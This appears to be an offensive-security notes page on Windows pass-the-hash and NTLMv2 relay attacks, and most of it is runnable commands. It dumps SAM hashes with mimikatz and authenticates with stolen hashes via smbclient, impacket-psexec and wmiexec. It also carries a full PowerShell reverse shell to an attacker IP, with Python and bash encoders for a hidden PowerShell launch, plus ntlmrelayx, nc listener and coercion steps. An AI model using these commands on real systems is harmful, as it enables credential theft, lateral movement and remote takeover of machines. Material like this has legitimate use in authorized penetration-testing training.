Passing Hash
Passing NTLM HASH
How to get the NTLM HASH
If you already have local administrator access on the machine, use the mimikatz commands below to dump the NT hashes of the local accounts from the SAM:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
...
mimikatz # lsadump::sam
lsadump::sam prints one block per local account (RID, User, then a "Hash NTLM:" line); the 32 hex characters after "Hash NTLM:" are the NT hash used in the commands below. token::elevate is needed because the SAM is only readable as SYSTEM.
Passing the NTLM HASH
Using SMBClient
Use this to access an SMB share with a discovered NT hash instead of the password (the hash is used directly in the NTLM authentication, no cracking needed):
smbclient \\\\192.168.50.212\\secrets -U UserName --pw-nt-hash 7a38310ea6f0027ee955abed1762964b
Using Impacket-psexec
You get a SYSTEM shell on the victim machine. psexec uploads a service binary to the ADMIN$ share and starts it as a service, so the account must be a local administrator on the target. The -hashes value is LMHASH:NTHASH; with NTLMv2 only the NT half is used, so the LM half can be all zeros (as below) or left empty (-hashes :NTHASH).
impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b UserName@192.168.1.2
Using Impacket-wmiexec
You get a semi-interactive shell running as the user whose hash was passed (not SYSTEM). Commands run via WMI over DCOM and the output is written to and read back from the ADMIN$ share, so local admin rights on the target are still required; no service is installed, so it leaves fewer artifacts than psexec.
impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b UserName@192.168.1.2
Relaying NTLMv2 HASH
An NTLMv2 hash (the Net-NTLMv2 challenge/response captured on the wire) cannot be passed like an NT hash, but it can be relayed: the victim authenticates to our SMB server and we forward that authentication to another host to get shell access. This only works if the target does not require SMB signing and the relayed account has local admin rights on it.
Steps: get a PowerShell reverse shell one-liner, base64-encode it, start ntlmrelayx with it as the command to run, start a listener, then make the victim authenticate to us.
Step 1: Get the reverse shell script. The IP and port must be your Kali IP and the port your listener uses (192.168.1.10 and 443 in the rest of these notes):
$client = New-Object System.Net.Sockets.TCPClient('192.168.1.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Step 2: Base64-encode it. powershell -e / -enc expects the base64 of the UTF-16LE encoding of the script (not UTF-8, and without a byte order mark). The Python script below does that:
import base64

# 'utf-16le' gives the bytes PowerShell -e expects; plain 'utf16' would prepend a BOM that
# has to be stripped again, so use the explicit little-endian codec
payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.1.10",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf-16le')).decode()
print(cmd)
Or use the bash one-liner below (iconv produces the UTF-16LE bytes, base64 -w0 keeps the output on one line; the single quotes stop bash from expanding the $ variables):
echo -n '$client = New-Object System.Net.Sockets.TCPClient("192.168.1.10",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv -f UTF-8 -t UTF-16LE | base64 -w0
Step 3: Use impacket-ntlmrelayx to relay
With the command below your Kali machine listens for incoming NTLM authentications (SMB on port 445; the HTTP listener is disabled) and relays each one to the target:
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.1.50 -c "powershell -enc <Base64_encoded_reverse_shell_Command>..."
-t : the target host the captured NTLMv2 authentication is relayed to (SMB by default; it must not require SMB signing)
-c : the command ntlmrelayx runs on the target once the relay succeeds; replace the placeholder with the Step 2 output
-smb2support : accept SMB2 clients
--no-http-server : run only the SMB listener
Step 4: Use nc to receive the shell (the port must match the one in Step 1):
nc -nvlp 443
Step 5: Get the NTLMv2 hash to relay
From wherever you have command execution on the victim (running as the user whose authentication you want relayed), access a file share on your Kali box. Windows authenticates to it with that user's credentials, ntlmrelayx forwards the authentication to the target, and the reverse shell lands on the nc listener:
dir \\192.168.1.10\test.txt